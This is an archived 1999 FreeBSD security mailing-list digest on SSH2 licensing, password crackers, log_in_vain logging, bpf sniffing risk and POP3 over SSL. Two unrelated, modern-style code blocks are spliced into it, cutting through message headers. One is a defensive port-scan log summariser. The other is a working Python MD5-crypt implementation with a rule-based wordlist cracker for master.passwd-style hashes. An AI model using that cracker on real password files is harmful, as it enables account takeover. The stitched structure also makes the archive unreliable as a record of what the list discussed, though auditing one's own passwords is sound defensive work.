To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 7:58:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 5ACF014CFD for ; Sat, 29 May 1999 07:58:12 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id QAA12413; Sat, 29 May 1999 16:58:05 +0200 (CEST) (envelope-from des) To: "Harry M. Leitzell" Cc: Nicholas Brawn , Fernando Schapachnik , freebsd-security@FreeBSD.ORG Subject: Re: SFTP (was Re: legal notice for telnet/etc) References: From: Dag-Erling Smorgrav Date: 29 May 1999 16:58:05 +0200 In-Reply-To: "Harry M. Leitzell"'s message of "Fri, 28 May 1999 18:54:37 -0400 (EDT)" Message-ID: Lines: 10 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Harry M. Leitzell" writes: > I am personally curious as to whether or not someone has developed > a free SSH2 daemon yet. That's a contradiction in terms. AFAIK, the SSH2 protocol is proprietary. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 8: 3:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 69A4914CFD for ; Sat, 29 May 1999 08:03:15 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id RAA12426; Sat, 29 May 1999 17:00:30 +0200 (CEST) (envelope-from des) To: Michael Richards <026809r@dragon.acadiau.ca> Cc: Dima , security@FreeBSD.ORG Subject: Re: System beeing cracked! References: 
From: Dag-Erling Smorgrav Date: 29 May 1999 17:00:30 +0200 In-Reply-To: Michael Richards's message of "Fri, 28 May 1999 20:51:05 -0300 (ADT)" Message-ID: Lines: 9 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Michael Richards <026809r@dragon.acadiau.ca> writes: > a) take your master.passwd file and run crack on it yourself and see if it > finds the passwords itself. I've found John to be far more powerful. It's in the ports. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 9:20:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.iserver.com (gatekeeper.iserver.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 505D914CFF for ; Sat, 29 May 1999 09:20:51 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.iserver.com; Sat, 29 May 1999 10:20:52 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.iserver.com via smap (V3.1.1) id xma027221; Sat, 29 May 99 10:20:27 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.2) id KAA23105; Sat, 29 May 1999 10:19:38 -0600 (MDT) Date: Sat, 29 May 1999 10:19:38 -0600 (MDT) 
From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: Dag-Erling Smorgrav Cc: security@FreeBSD.ORG Subject: Re: System beeing cracked! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 29 May 1999, Dag-Erling Smorgrav wrote: > > a) take your master.passwd file and run crack on it yourself and see if it > > finds the passwords itself. > > I've found John to be far more powerful. It's in the ports. Yes, I would second that opinion. John the Ripper understands many of the non-DES crypt replacements used in various UNIX versions, such as FreeBSD's MD5 and OpenBSD's Blowfish, and uses hand-optimized assembly language versions of the hashing algorithms on many target architectures. It is probably the best overall password cracker available, in my opinion. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 9:37:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from news.kiev.sovam.com (news.kiev.sovam.com [194.186.143.16]) by hub.freebsd.org (Postfix) with ESMTP id A644F14CFF for ; Sat, 29 May 1999 09:37:50 -0700 (PDT) (envelope-from mail@news.kiev.sovam.com) Received: from mail by news.kiev.sovam.com with local (Exim 2.12 #1) id 10nm7J-000NHP-00 for freebsd-security@freebsd.org; Sat, 29 May 1999 19:37:49 +0300 
From: Vladimir Litovka To: freebsd-security@freebsd.org Reply-To: Vladimir Litovka Subject: Re: TCP connect data logger Date: 29 May 1999 16:37:49 GMT Message-ID: <7ip54t$2n98$2@news.kiev.sovam.com> X-Organization: Sovam Teleport Kiev (post does not reflect views of Sovam Teleport) X-Gated-By: news2list v1.3, (c) Vladimir Litovka X-Gated-Date: Sat May 29 16:37:49 1999 GMT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warren Toomey wrote: > The sysctl net.inet.udp.log_in_vain option seems to be the one. Where are these sysctl variables described? I didn't find them in the man page for sysctl - there is only a small number of variables there... Thank you. -- doka To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 9:43:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from news.kiev.sovam.com (news.kiev.sovam.com [194.186.143.16]) by hub.freebsd.org (Postfix) with ESMTP id D70D714F8F for ; Sat, 29 May 1999 09:43:44 -0700 (PDT) (envelope-from mail@news.kiev.sovam.com) Received: from mail by news.kiev.sovam.com with local (Exim 2.12 #1) id 10nmD2-000NI3-00 for freebsd-security@freebsd.org; Sat, 29 May 1999 19:43:44 +0300 
From: Vladimir Litovka To: freebsd-security@freebsd.org Reply-To: Vladimir Litovka Subject: Re: TCP connect data logger Date: 29 May 1999 16:43:43 GMT Message-ID: <7ip5fv$2n98$3@news.kiev.sovam.com> References: <19990525000758.A14670@fw.garman.net> <199905250414.OAA03109@henry.cs.adfa.edu.au> X-Organization: Sovam Teleport Kiev (post does not reflect views of Sovam Teleport) X-Gated-By: news2list v1.3-pl1, (c) Vladimir Litovka X-Gated-Date: Sat May 29 16:43:44 1999 GMT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warren Toomey wrote: Where are these sysctl variables described? I didn't find them in the man page for sysctl - there is only a small number of variables there... Thank you. -- doka To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 9:58:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp11.bellglobal.com (smtp11.bellglobal.com [204.101.251.53]) by hub.freebsd.org (Postfix) with ESMTP id B9E581520E for ; Sat, 29 May 1999 09:58:36 -0700 (PDT) (envelope-from bryanf@geisha.apt.samurai.com) Received: from geisha.apt.samurai.com (HSE-TOR-ppp37186.sympatico.ca [209.226.141.253]) by smtp11.bellglobal.com (8.8.5/8.8.5) with ESMTP id NAA10864; Sat, 29 May 1999 13:01:19 -0400 (EDT) Received: (from bryanf@localhost) by geisha.apt.samurai.com (8.9.1a/8.9.1) id MAA04836; Sat, 29 May 1999 12:58:33 -0400 (EDT) Date: Sat, 29 May 1999 12:58:32 -0400 
From: Bryan Fullerton To: Dag-Erling Smorgrav Cc: "Harry M. Leitzell" , Nicholas Brawn , Fernando Schapachnik , freebsd-security@FreeBSD.ORG Subject: Re: SFTP (was Re: legal notice for telnet/etc) Message-ID: <19990529125832.B435@samurai.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.96.1i In-Reply-To: ; from Dag-Erling Smorgrav on Sat, May 29, 1999 at 04:58:05PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 29, 1999 at 04:58:05PM +0200, Dag-Erling Smorgrav wrote: > "Harry M. Leitzell" writes: > > I am personally curious as to whether or not someone has developed > > a free SSH2 daemon yet. > > That's a contradiction in terms. AFAIK, the SSH2 protocol is > proprietary. That would surprise the IETF. See http://www.net.lut.ac.uk/psst/ for links to the IETF working group documents regarding making the ssh2 protocol an Internet standard, as well as links to a GPL'ed ssh2 implementation (in early development - currently at v0.1). Bryan -- Bryan Fullerton http://www.samurai.com/ Core Competency Samurai Consulting "No, we don't do seppuku." Can you feel the Ohmu call? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 14:43:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.cybcon.com (mail.cybcon.com [205.147.64.46]) by hub.freebsd.org (Postfix) with ESMTP id E4BB314C56 for ; Sat, 29 May 1999 14:43:06 -0700 (PDT) (envelope-from wwoods@cybcon.com) Received: from william (usr1-37.cybcon.com [205.147.75.38]) by mail.cybcon.com (8.9.0/8.9.0) with SMTP id OAA12475; Sat, 29 May 1999 14:43:03 -0700 (PDT) 
From: "William Woods" To: "Justin Wolf" Cc: "FreeBSD Security" Subject: RE: System beeing cracked! Date: Sat, 29 May 1999 14:43:04 -0700 Message-ID: <000001beaa1c$3b44bf80$264b93cd@william> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-reply-to: <006201bea999$ee5e4b00$06c3fe90@cisco.com> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > unless you have to. Don't have bpf compiled into the kernel. Get strobe OK....why is this a bad thing? I need bpf (or so I understand) to use nmap William To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 15:49:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id DAFA714F92 for ; Sat, 29 May 1999 15:49:52 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id PAA21150; Sat, 29 May 1999 15:48:48 -0700 (PDT) Message-ID: <19990529154848.A19679@best.com> Date: Sat, 29 May 1999 15:48:48 -0700 
From: "Jan B. Koum " To: Dag-Erling Smorgrav , "Harry M. Leitzell" Cc: Nicholas Brawn , Fernando Schapachnik , freebsd-security@FreeBSD.ORG Subject: Re: SFTP (was Re: legal notice for telnet/etc) References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Dag-Erling Smorgrav on Sat, May 29, 1999 at 04:58:05PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 29, 1999 at 04:58:05PM +0200, Dag-Erling Smorgrav wrote: > "Harry M. Leitzell" writes: > > I am personally curious as to whether or not someone has developed > > a free SSH2 daemon yet. > > That's a contradiction in terms. AFAIK, the SSH2 protocol is > proprietary. > > DES > -- > Dag-Erling Smorgrav - des@flood.ping.uio.no > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message Ahem. You are not correct I think. The ssh2 software which people in www.ssh.fi land wrote has a very restricted license, but the protocol itself is open. See: http://www.ietf.cnri.reston.va.us/ids.by.wg/secsh.html for IETF drafts. [this is like tcp/ip -- MS has a proprietary stack, but protocol is open] -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 16: 8:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 5C66C14CC6 for ; Sat, 29 May 1999 16:08:46 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id QAA23069; Sat, 29 May 1999 16:08:17 -0700 (PDT) Message-ID: <19990529160817.B19679@best.com> Date: Sat, 29 May 1999 16:08:17 -0700 
From: "Jan B. Koum " To: Vladimir Litovka , freebsd-security@FreeBSD.ORG Subject: Re: TCP connect data logger References: <19990525000758.A14670@fw.garman.net> <199905250414.OAA03109@henry.cs.adfa.edu.au> <7ip5fv$2n98$3@news.kiev.sovam.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <7ip5fv$2n98$3@news.kiev.sovam.com>; from Vladimir Litovka on Sat, May 29, 1999 at 04:43:43PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 29, 1999 at 04:43:43PM +0000, Vladimir Litovka wrote: > Warren Toomey wrote: > > Where are these sysctl variables described? I didn't find them in the man page for > sysctl - there is only a small number of variables there... > > Thank you. > > -- > doka Look in the source: vi /usr/src/sys/netinet/tcp_input.c -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 16:20:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id BE5A214ED6 for ; Sat, 29 May 1999 16:20:01 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id BAA04350 for security@FreeBSD.ORG; Sun, 30 May 1999 01:19:58 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id CB62387AE; Sun, 30 May 1999 00:02:48 +0200 (CEST) (envelope-from roberto) Date: Sun, 30 May 1999 00:02:48 +0200 
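For readers who turn on net.inet.tcp.log_in_vain and net.inet.udp.log_in_vain after following the pointer into tcp_input.c: the kernel then writes one syslog line per connection attempt to a port with no listener, which is handy for spotting a port scan and useless as a permanent alarm because every stray packet becomes a line. The script below is an added example, not code from the message or from FreeBSD. It parses constructed syslog lines in the format I read in tcp_input.c and udp_usrreq.c ("Connection attempt to TCP dst:port from src:port"; check the string against your own kernel source, since it is an assumption here), and reports sources that probed several distinct closed ports. Hostname, addresses, timestamps and the threshold are all made up for the demo.

```python
"""Summarise FreeBSD log_in_vain kernel messages into per-source port-probe
reports.  Added example, not from the mailing list or FreeBSD; the message
format is as I read it in tcp_input.c/udp_usrreq.c and the log lines below
are constructed."""
import re
from collections import defaultdict

# Kernel text for log_in_vain (assumed layout; verify in your kernel source).
# syslogd prepends the timestamp, hostname and "/kernel:" seen in the sample.
LOG_RE = re.compile(
    r"Connection attempt to (?P<proto>TCP|UDP) "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<dport>\d+) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+)"
)

# Constructed /var/log/messages excerpt: one host walking five closed ports,
# one remote mail server doing a single ident (113) lookup, one unrelated line.
SAMPLE_LOG = """\
May 29 19:37:49 gw /kernel: Connection attempt to TCP 192.0.2.10:23 from 198.51.100.7:1041
May 29 19:37:49 gw /kernel: Connection attempt to TCP 192.0.2.10:21 from 198.51.100.7:1042
May 29 19:37:49 gw /kernel: Connection attempt to TCP 192.0.2.10:110 from 198.51.100.7:1043
May 29 19:37:50 gw /kernel: Connection attempt to TCP 192.0.2.10:143 from 198.51.100.7:1044
May 29 19:37:50 gw /kernel: Connection attempt to UDP 192.0.2.10:111 from 198.51.100.7:1045
May 29 19:38:02 gw /kernel: Connection attempt to TCP 192.0.2.10:113 from 203.0.113.5:3381
May 29 19:38:02 gw sshd[412]: log: Connection from 203.0.113.5 port 3382
"""


def parse(log_text):
    """Return [(proto, src, dport)] for every log_in_vain line; skip the rest."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m:
            hits.append((m["proto"], m["src"], int(m["dport"])))
    return hits


def scanners(log_text, threshold=3):
    """Sources that hit at least `threshold` distinct (proto, port) pairs.

    A single hit is usually an ident lookup or a mistyped address; a spread
    of ports from one source in a short window is the scan signature."""
    probed = defaultdict(set)
    for proto, src, dport in parse(log_text):
        probed[src].add((proto, dport))
    return {src: sorted(ports) for src, ports in probed.items()
            if len(ports) >= threshold}


if __name__ == "__main__":
    for src, ports in scanners(SAMPLE_LOG).items():
        print(f"{src} probed {len(ports)} closed ports: {ports}")
```

The threshold is what keeps the single ident probe from the mail server out of the report; tune it to the site rather than alerting on every line. Two caveats go with the sysctl itself: a remote host can grow /var/log/messages as fast as it can send SYNs, and the log shows only ports with no listener, so a service that is open and being brute-forced never appears here at all.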
From: Ollivier Robert To: security@FreeBSD.ORG Subject: Re: System beeing cracked! Message-ID: <19990530000248.A6429@keltia.freenix.fr> Mail-Followup-To: security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.95.5i In-Reply-To: ; from Paul Hart on Sat, May 29, 1999 at 10:19:38AM -0600 X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5322 AMD-K6 MMX @ 200 MHz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Paul Hart: > non-DES crypt replacements used in various UNIX versions, such as > FreeBSD's MD5 and OpenBSD's Blowfish, and uses hand-optimized assembly So does Crack 5.0a, I know, I gave Alec the pointers to it because he told me that he was a Linux guy but wanted to support our scheme :-) OpenBSD is not supported though because Crack was out before they implemented it. > It is probably the best overall password cracker available, in my opinion. I've not looked at JtR recently but I like the rule-based way of doing things used in Crack. -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #71: Sun May 9 20:16:32 CEST 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 17: 0:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from ecpi.com (ns1.ecpi.com [208.21.246.3]) by hub.freebsd.org (Postfix) with ESMTP id 6CDAE14DED for ; Sat, 29 May 1999 17:00:43 -0700 (PDT) (envelope-from tpatel@ecpi.com) Received: from vishnu ([208.21.246.30]) by ecpi.com (8.8.8/8.8.8) with SMTP id SAA07002 for ; Sat, 29 May 1999 18:54:41 -0500 (CDT) Message-ID: <000501beaa2e$ff33e080$0300000a@vishnu.ecpi.com> 
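A worked illustration of what this thread has been saying about mangling rules, 'leet substitutions and MD5-crypt, added here as an example; it is not code from anyone in the thread, from Crack or from John the Ripper. It implements FreeBSD's $1$ MD5-crypt in pure Python and runs a small Crack/John-style rule-based wordlist attack over constructed hashes: the user names, salts, passwords and wordlist are made up for the demo. The point it makes is the one Michael and the leet-substitution reply were arguing: a dictionary word with one capital letter and one e-to-3 swap falls within a few dozen guesses per word, while a random string survives the whole wordlist.

```python
"""Wordlist attack with Crack/John-style mangling rules against FreeBSD
MD5-crypt ($1$) hashes.  Added example for this thread, not code from
Crack, John the Ripper or FreeBSD; the users, salts, passwords and
wordlist below are constructed for the demo."""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(v, n):
    # crypt(3)-style base-64: least significant 6 bits first, n characters
    return "".join(ITOA64[(v >> (6 * k)) & 0x3F] for k in range(n))


def md5crypt(password, salt):
    """FreeBSD MD5-crypt (Poul-Henning Kamp's scheme): 1000 MD5 rounds of
    password/salt mixing, returning the full '$1$salt$hash' string."""
    pw, salt, magic = password.encode(), salt.encode()[:8], b"$1$"
    ctx = hashlib.md5(pw + magic + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    for off in range(0, len(pw), 16):          # alt digest, once per 16 bytes of pw
        ctx.update(alt[:min(16, len(pw) - off)])
    i = len(pw)
    while i:                                    # one byte per bit of len(pw)
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                       # the deliberately slow part
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    groups = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    out = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                  for a, b, c in groups)
    return (magic + salt).decode() + "$" + out + _to64(final[11], 2)


# The "commonly substituted letters" from the thread, plus o->0.
LEET = {"i": "1", "l": "1", "e": "3", "s": "5", "a": "4", "o": "0"}


def candidates(word):
    """Mangling rules: case variants x (as-is | last leet-able char | all leet)."""
    cases = [word, word.capitalize(), word.upper()]
    cases += [word[:i] + word[i].upper() + word[i + 1:] for i in range(len(word))]
    seen = set()
    for w in cases:
        variants = [w, "".join(LEET.get(ch.lower(), ch) for ch in w)]
        for i in range(len(w) - 1, -1, -1):     # substitute only the last leet-able char
            if w[i].lower() in LEET:
                variants.insert(1, w[:i] + LEET[w[i].lower()] + w[i + 1:])
                break
        for v in variants:
            if v not in seen:
                seen.add(v)
                yield v


def crack(shadow_lines, wordlist):
    """Return {user: password} for every $1$ hash some mangled word matches."""
    found = {}
    for line in shadow_lines:
        user, h = line.split(":")[:2]
        if not h.startswith("$1$"):
            continue                            # only MD5-crypt handled here
        salt = h.split("$")[2]
        for word in wordlist:
            hit = next((c for c in candidates(word) if md5crypt(c, salt) == h), None)
            if hit is not None:
                found[user] = hit
                break
    return found


# Constructed master.passwd-style entries (user:hash); not real accounts.
SAMPLE_SHADOW = [
    "dima:" + md5crypt("thisissEcur3", "Zq7xY2Bn"),  # the thread's example
    "guest:" + md5crypt("p455w0rd", "aB3dEfGh"),     # "password" fully leeted
    "ops:" + md5crypt("kR9#vLq2mZ", "s4LtS4lT"),     # random; no rule reaches it
]
WORDLIST = ["thisissecure", "password", "freebsd"]

if __name__ == "__main__":
    for user, pw in crack(SAMPLE_SHADOW, WORDLIST).items():
        print(f"{user}: {pw}")
```

Running it recovers dima and guest and leaves ops alone. Each word expands to only a few dozen guesses here; Crack and John ship far larger rule sets and hand-optimized hashing, which is why "thisissEcur3" counts as weak despite its twelve characters: its entropy is that of one dictionary word plus a couple of rule choices, not of twelve random symbols, and the 1000 MD5 rounds only slow the attacker by a constant factor.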
From: "Tushar Patel" To: Subject: POP3 server with SSL Date: Sat, 29 May 1999 18:56:53 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, We need to allow a few people to access their pop3 e-mail over a secure connection. Is there a way to run a pop3 server with SSL support? Any pointers will be a good help. Thanks, Tushar tpatel @ ecpi.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 17: 3:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id D811D14CF9 for ; Sat, 29 May 1999 17:03:39 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id RAA28474; Sat, 29 May 1999 17:03:25 -0700 (PDT) Message-ID: <19990529170325.A28298@best.com> Date: Sat, 29 May 1999 17:03:25 -0700 
From: "Jan B. Koum " To: William Woods , Justin Wolf Cc: FreeBSD Security Subject: Re: System beeing cracked! References: <006201bea999$ee5e4b00$06c3fe90@cisco.com> <000001beaa1c$3b44bf80$264b93cd@william> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <000001beaa1c$3b44bf80$264b93cd@william>; from William Woods on Sat, May 29, 1999 at 02:43:04PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 29, 1999 at 02:43:04PM -0700, William Woods wrote: > > unless you have to. Don't have bpf compiled into the kernel. Get strobe > > OK....why is this a bad thig? I need bpf (or so I understand) to use nmap > > William > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message Usually if someone cracks root on your box, they can then sniff the LAN for pop3/telnet/ftp passwords and compromise other systems on that LAN. On the other hand, if someone cracks root and you have LKM (or KLD) enabled, a skilled attacker can just insert a bpf module into a running system I would guess. There is a paper on how to abuse LKM under linux at: http://www.infowar.co.uk/thc/files/thc/LKM_HACKING.html -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 19:20:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from guepardo.vicosa.com.br (guepardo.tdnet.com.br [200.236.148.6]) by hub.freebsd.org (Postfix) with ESMTP id CF1CF14CB1 for ; Sat, 29 May 1999 19:20:30 -0700 (PDT) (envelope-from kernel@tdnet.com.br) Received: from tdnet.com.br [200.236.148.193] by guepardo.vicosa.com.br with ESMTP (SMTPD32-5.00) id A30A1080096; Sat, 29 May 1999 23:31:38 -0300 Message-ID: <3750761E.7033F669@tdnet.com.br> Date: Sat, 29 May 1999 23:19:58 +0000 
From: Unknow User X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386) MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: System beeing cracked! References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Can anybody point me to where I can download John? Paul Hart wrote: > Yes, I would second that opinion. John the Ripper understands many of the > non-DES crypt replacements used in various UNIX versions, such as > FreeBSD's MD5 and OpenBSD's Blowfish, and uses hand-optimized assembly > language versions of the hashing algorithms on many target architectures. -- "The box said 'Requires Windows 98, NT, Linux or better' so I installed FreeBSD." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 19:27:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from pop3-3.enteract.com (pop3-3.enteract.com [207.229.143.32]) by hub.freebsd.org (Postfix) with SMTP id EF1D014CB7 for ; Sat, 29 May 1999 19:27:41 -0700 (PDT) (envelope-from dscheidt@enteract.com) Received: (qmail 44549 invoked from network); 30 May 1999 03:27:44 -0000 Received: from shell-3.enteract.com (dscheidt@207.229.143.42) by pop3-3.enteract.com with SMTP; 30 May 1999 03:27:44 -0000 Received: from localhost (dscheidt@localhost) by shell-3.enteract.com (8.9.3/8.9.2) with SMTP id VAA84387; Sat, 29 May 1999 21:26:36 -0500 (CDT) (envelope-from dscheidt@enteract.com) X-Authentication-Warning: shell-3.enteract.com: dscheidt owned process doing -bs Date: Sat, 29 May 1999 21:26:36 -0500 (CDT) 
From: David Scheidt
To: Unknow User
Cc: security@FreeBSD.ORG
Subject: Re: System beeing cracked!
In-Reply-To: <3750761E.7033F669@tdnet.com.br>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 29 May 1999, Unknow User wrote:
> Can anybody point me to where I can download John?

/usr/ports/security/john if you have the ports collection installed.
http://www.freebsd.org/ports/security.html if you haven't.

David Scheidt

From owner-freebsd-security Sat May 29 20: 4:31 1999
Delivered-To: freebsd-security@freebsd.org
Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 6324E1515D for ; Sat, 29 May 1999 20:04:17 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com)
Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id UAA28142; Sat, 29 May 1999 20:03:09 -0700 (PDT)
Message-ID: <19990529200308.A20682@best.com>
Date: Sat, 29 May 1999 20:03:08 -0700
From: "Jan B. Koum "
To: David Scheidt , Unknow User
Cc: security@FreeBSD.ORG
Subject: Re: System beeing cracked!
References: <3750761E.7033F669@tdnet.com.br>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: ; from David Scheidt on Sat, May 29, 1999 at 09:26:36PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, May 29, 1999 at 09:26:36PM -0500, David Scheidt wrote:
> On Sat, 29 May 1999, Unknow User wrote:
>
> > Can anybody point me to where I can download John?
>
> /usr/ports/security/john if you have the ports collection installed.
> http://www.freebsd.org/ports/security.html if you haven't.
>
> David Scheidt

And from http://www.false.com/security/john/ for those who don't use
ports/packages and like to "roll your own".

-- Yan

From owner-freebsd-security Sat May 29 20:13:15 1999
Delivered-To: freebsd-security@freebsd.org
